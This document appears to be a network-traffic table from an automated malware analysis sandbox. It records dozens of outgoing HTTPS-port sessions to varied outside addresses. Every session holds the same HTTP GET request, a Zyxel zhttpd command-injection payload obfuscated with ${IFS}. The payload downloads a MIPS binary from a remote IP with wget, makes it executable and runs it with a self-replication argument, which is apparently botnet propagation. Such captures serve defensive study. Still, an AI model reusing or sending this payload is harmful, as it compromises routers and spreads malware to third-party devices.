                                                        Jan 28, 2024 10:12:42.201663971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1816192.168.2.1442996212.35.109.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201688051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1817192.168.2.1455750202.177.8.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201721907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1818192.168.2.1447136157.220.126.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201778889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1819192.168.2.1460634220.209.9.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201822996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1820192.168.2.1445530125.155.251.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201848030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1821192.168.2.144573089.159.105.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201915026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1822192.168.2.144376471.42.170.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201936960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1823192.168.2.1436300145.56.229.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.201987982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1824192.168.2.144329279.101.239.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202016115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1825192.168.2.144833865.58.55.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202047110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1826192.168.2.1443996141.245.140.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202097893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1827192.168.2.1434776150.141.127.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202142000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1828192.168.2.1440820168.84.247.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202181101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1829192.168.2.146059038.137.127.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202240944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1830192.168.2.1458338182.180.172.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202276945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1831192.168.2.1450214192.238.136.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202306032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1832192.168.2.144149023.130.63.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202337980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1833192.168.2.1438800135.91.230.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202406883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1834192.168.2.143431236.97.154.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202450991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1835192.168.2.1452812111.103.158.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202478886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1836192.168.2.1433516148.181.143.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202507019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1837192.168.2.1460946168.24.118.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202528000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1838192.168.2.1450598216.164.236.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202564001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1839192.168.2.143785674.172.122.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202601910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1840192.168.2.143816295.76.128.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202661037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1841192.168.2.145004627.228.54.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202689886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1842192.168.2.1455856104.213.128.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202738047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1843192.168.2.145120699.33.21.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202761889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1844192.168.2.143595449.59.109.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202797890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1845192.168.2.1458362213.52.120.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202832937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1846192.168.2.146071493.167.65.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202869892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1847192.168.2.1440212169.254.124.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202914953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1848192.168.2.1439528203.246.158.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202960968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1849192.168.2.1458032196.252.170.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202964067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1850192.168.2.1446358178.82.42.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.202991009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1851192.168.2.1459784115.112.178.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203035116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1852192.168.2.144089086.186.55.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203063965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1853192.168.2.1449510159.212.245.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203094006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1854192.168.2.1458072122.140.46.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203147888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1855192.168.2.145181850.63.87.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203183889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1856192.168.2.1454270210.211.172.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203200102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1857192.168.2.1458490115.158.112.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203238964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1858192.168.2.1439610206.123.14.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203270912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1859192.168.2.144623070.209.2.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203310013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1860192.168.2.1449148125.103.226.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203336954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1861192.168.2.145983883.239.0.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203383923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1862192.168.2.144773214.84.13.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203414917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1863192.168.2.14454022.96.179.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203445911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1864192.168.2.1442886141.118.119.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203479052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1865192.168.2.1443540124.241.213.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203512907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1866192.168.2.1433346189.42.226.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203553915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1867192.168.2.1437966143.251.200.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203593969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1868192.168.2.144888083.225.126.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203643084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1869192.168.2.1451788223.202.239.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203692913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1870192.168.2.1442898177.139.76.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203721046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1871192.168.2.1444556200.130.13.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203758955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1872192.168.2.144269649.88.90.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203783989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1873192.168.2.144541423.109.29.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203843117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1874192.168.2.144105458.180.181.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203887939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1875192.168.2.1451564207.244.156.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.203915119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1876192.168.2.1459192113.133.92.33443
                                                        TimestampBytes transferredDirectionData
